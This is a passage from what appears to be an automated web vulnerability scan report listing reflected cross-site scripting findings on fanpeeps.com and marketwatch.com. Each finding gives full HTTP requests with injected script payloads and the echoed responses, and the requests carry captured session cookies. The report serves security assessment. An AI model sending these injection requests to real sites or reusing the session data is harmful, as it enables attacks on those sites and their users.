Cookie: djcs_route=3745086d-ef84-4e3d-8fb3-761e62d9d99d; wsjregion=na%2cus; s_vnum=1307959748765%26vn%3D1; s_dbfe=1305367748766; DJSESSION=ORCS%3Dna%2Cus%7C%7CBIZO%3Dbiz%3D1053%3B; DJCOOKIE=ORC%3Dna%2Cus%7C%7CweatherUser%3D%7C%7CweatherJson%3D%7B%22city%22%3A%22New%20York%22%2C%22image%22%3A%2233%22%2C%22high%22%3A%5B%2270%22%5D%2C%22low%22%3A%5B%2256%22%5D%2C%22url%22%3A%22http%3A%2F%2Fonline.wsj.com%2Fpublic%2Fpage%2Faccuweather-detailed-forecast.html%3Fname%3DNew%20York%2C%20NY%26location%3D10005%26u%3Dhttp%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0http%253A%2F%2Fwww.accuweather.com%2Fhosted%2Fwsj%2Fwsj.asp%253Flocation%253D10005%2526metric%253D0%22%7D%7C%7CweatherExpire%3DSat%2C%2014%20May%202011%2010%3A29%3A14%20GMT%7C%7CweatherCode%3D10005; rsi_csl=; rsi_segs=; mbox=check#true#1305367858|session#1305367797515-52119#1305369658; s_cc=true; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Sat, 14 May 2011 10:13:24 GMT
Server: Microsoft-IIS/6.0
X-Machine: SBK-MW04
P3P: CP=CAO DSP COR CURa ADMa DEVi TAIo PSAa PSDa IVDi CONi OTPi OUR OTRi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA OTC
X-Powered-By: ASP.NET
pragma: no-cache
Content-Length: 43358
Content-Type: text/html
Expires: Fri, 13 May 2011 10:12:24 GMT
Cache-control: False

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><!-- Generated on SBK-MW04 -->
<HTML><HEAD><meta name="description" content="M
...[SNIP]...
tifying name, server, and channel on the next lines. */
s.hier1="MarketWatch,Not Found,Other,Error Page,http://www.marketwatch.com/404.asp404;http://www.marketwatch.com:80/api-video/get_video_info.asp21cdf";6c5435b28da?guid={7a591b4c-215b-4895-a64a-c793aeebb8a6}&fields=thumbnailurlsmall&cb=1534993"
s.pageName="Error Page"
s.server="www.marketwatch.com"
s.channel="MarketWatch"
s.prop1="Not Found"
s.prop2="Other"
...[SNIP]...

4.85. http://www.fanpeeps.com/ [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fanpeeps.com
Path:   /

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 8f352><script>alert(1)</script>78a6f46f052 was submitted in the action parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=tweets8f352><script>alert(1)</script>78a6f46f052&pid=14&iid=4 HTTP/1.1
Host: www.fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/?pid=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9a60411f58fb3454c5f556257e253120; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.6.10.1305376380

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:34:08 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 101534

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=action value=tweets8f352><script>alert(1)</script>78a6f46f052>
...[SNIP]...

4.86. http://www.fanpeeps.com/ [action parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fanpeeps.com
Path:   /

Issue detail

The value of the action request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c860b'><script>alert(1)</script>29abf483c43 was submitted in the action parameter. This input was echoed as c860b\'><script>alert(1)</script>29abf483c43 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?action=tweetsc860b'><script>alert(1)</script>29abf483c43&pid=14&iid=4 HTTP/1.1
Host: www.fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/?pid=14
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9a60411f58fb3454c5f556257e253120; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.6.10.1305376380

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:34:08 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 101540

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=action value='tweetsc860b\'><script>alert(1)</script>29abf483c43'>
...[SNIP]...

4.87. http://www.fanpeeps.com/ [iid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fanpeeps.com
Path:   /

Issue detail

The value of the iid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload eb66e><script>alert(1)</script>fc611338e18 was submitted in the iid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?iid=2eb66e><script>alert(1)</script>fc611338e18&pid=14 HTTP/1.1
Host: www.fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/?action=tweets&pid=14&iid=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9a60411f58fb3454c5f556257e253120; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.7.10.1305376380

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:34:11 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 62410

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<input type=hidden name=idol value=2eb66e><script>alert(1)</script>fc611338e18>
...[SNIP]...

4.88. http://www.fanpeeps.com/ [iid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fanpeeps.com
Path:   /

Issue detail

The value of the iid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9b419"><script>alert(1)</script>ab1641f8df6 was submitted in the iid parameter. This input was echoed as 9b419\"><script>alert(1)</script>ab1641f8df6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?iid=29b419"><script>alert(1)</script>ab1641f8df6&pid=14 HTTP/1.1
Host: www.fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/?action=tweets&pid=14&iid=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9a60411f58fb3454c5f556257e253120; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.7.10.1305376380

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:34:11 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 62423

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
   <t
...[SNIP]...
<a href="/?pid=14&idol=29b419\"><script>alert(1)</script>ab1641f8df6&action=tweets">
...[SNIP]...

4.89. http://www.fanpeeps.com/ [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fanpeeps.com
Path:   /

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cbf3"><script>alert(1)</script>4806a366db was submitted in the pid parameter. This input was echoed as 4cbf3\"><script>alert(1)</script>4806a366db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pid=144cbf3"><script>alert(1)</script>4806a366db HTTP/1.1
Host: www.fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9a60411f58fb3454c5f556257e253120; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.5.10.1305376380

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:34:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 18110

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...
<a href="?pid=144cbf3\"><script>alert(1)</script>4806a366db">
...[SNIP]...

4.90. http://www.fanpeeps.com/ [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fanpeeps.com
Path:   /

Issue detail

The value of the pid request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 2d1d7><script>alert(1)</script>f3294fbacbe was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /?pid=142d1d7><script>alert(1)</script>f3294fbacbe HTTP/1.1
Host: www.fanpeeps.com
Proxy-Connection: keep-alive
Referer: http://www.fanpeeps.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=181893936.1305373774.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=9a60411f58fb3454c5f556257e253120; __utma=181893936.1520938759.1305373774.1305373774.1305376380.2; __utmc=181893936; __utmb=181893936.5.10.1305376380

Response

HTTP/1.1 200 OK
Date: Sat, 14 May 2011 12:34:00 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.5
X-Powered-By: PHP/5.2.5
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 18095

<br />
<b>Warning</b>: mysql_fetch_object(): supplied argument is not a valid MySQL result resource in <b>/home/cerebel6/public_html/fan/loaddata.php</b> on line <b>26</b><br />
<!DOCTYPE html PUBLIC
...[SNIP]...
<a rel=nofollow href=/?action=home&pid=-1&zpid=142d1d7><script>alert(1)</script>f3294fbacbe>
...[SNIP]...

4.91. http://www.marketwatch.com/Dockingbar/Dock/_AlertItem [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /Dockingbar/Dock/_AlertItem

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c56d'%3b41cfb76de42 was submitted in the REST URL parameter 2. This input was echoed as 6c56d';41cfb76de42 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Dockingbar/Dock6c56d'%3b41cfb76de42/_AlertItem HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-Powered-By: ASP.NET
X-MACHINE: sbkdedtwebp01
Date: Sat, 14 May 2011 11:03:13 GMT
Content-Length: 50903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/Dockingbar/Dock6c56d';41cfb76de42/_AlertItem';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.92. http://www.marketwatch.com/Dockingbar/Dock/_AlertItem [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /Dockingbar/Dock/_AlertItem

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 314bf'%3bb227a982ee5 was submitted in the REST URL parameter 3. This input was echoed as 314bf';b227a982ee5 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Dockingbar/Dock/_AlertItem314bf'%3bb227a982ee5 HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.5
X-AspNetMvc-Version: 3.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp02
Date: Sat, 14 May 2011 11:03:48 GMT
Content-Length: 50968

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/Dockingbar/Dock/_AlertItem314bf';b227a982ee5';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.93. http://www.marketwatch.com/bg/api/Connect.ashx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /bg/api/Connect.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10e11'%3b8180e7efad1 was submitted in the REST URL parameter 1. This input was echoed as 10e11';8180e7efad1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /bg10e11'%3b8180e7efad1/api/Connect.ashx HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
Origin: http://www.marketwatch.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; refresh=off
Content-Length: 2

{}

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp03
Date: Sat, 14 May 2011 10:19:02 GMT
Content-Length: 50839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/bg10e11';8180e7efad1/api/Connect.ashx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.94. http://www.marketwatch.com/bg/api/Connect.ashx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /bg/api/Connect.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload dbe05'%3b9bca35ec658 was submitted in the REST URL parameter 2. This input was echoed as dbe05';9bca35ec658 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /bg/apidbe05'%3b9bca35ec658/Connect.ashx HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
Origin: http://www.marketwatch.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; refresh=off
Content-Length: 2

{}

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-MACHINE: sbkdfinwebp04
Date: Sat, 14 May 2011 10:19:26 GMT
Content-Length: 50862

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/bg/apidbe05';9bca35ec658/Connect.ashx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.95. http://www.marketwatch.com/bg/api/Pickup.ashx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /bg/api/Pickup.ashx

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 576c0'%3b39ce4880832 was submitted in the REST URL parameter 1. This input was echoed as 576c0';39ce4880832 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /bg576c0'%3b39ce4880832/api/Pickup.ashx HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
Origin: http://www.marketwatch.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mw5_prefs=mox=False&exp=5/14/2013; mw5_ads=seen=16; __g_c=w%3A1%7Cb%3A2%7Cc%3A314598747735047%7Cd%3A1%7Ca%3A0%7Ce%3A0.01%7Cf%3A0; __g_u=314598747735047_1_0.01_0_5_1305799975264; s_cc=true; s_vnum=1307959980006%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D; refresh=off; rsi_csl=; rsi_segs=
Content-Length: 6314

c=%7B%22c%22%3A%22d71e124eb75a400681a0e3b95b460529%22%2C%22s%22%3A%2210.240.178.143%22%7D&m=%5B%7B%22h%22%3A%7B%22t%22%3A%22%2Fquotes%2Fcomstock%2F10w!i%3Adji%22%2C%22a%22%3A%22subscribe%22%7D%2C%22b%
...[SNIP]...

Response

HTTP/1.1 404 Not Found
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
X-MACHINE: sbkdfpswebp04
Date: Sat, 14 May 2011 10:19:49 GMT
Content-Length: 50914

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="htt
...[SNIP]...
<script type="text/javascript">
   // if present, canonical link is preferred
   var p = '/bg576c0';39ce4880832/api/Pickup.ashx';
   var cl = $('link[rel=canonical]');
   if(cl != undefined && cl.length >
...[SNIP]...

4.96. http://www.marketwatch.com/bg/api/Pickup.ashx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.marketwatch.com
Path:   /bg/api/Pickup.ashx

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53699'%3b3aed18dbeed was submitted in the REST URL parameter 2. This input was echoed as 53699';3aed18dbeed in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

POST /bg/api53699'%3b3aed18dbeed/Pickup.ashx HTTP/1.1
Host: www.marketwatch.com
Proxy-Connection: keep-alive
Referer: http://www.marketwatch.com/
Origin: http://www.marketwatch.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
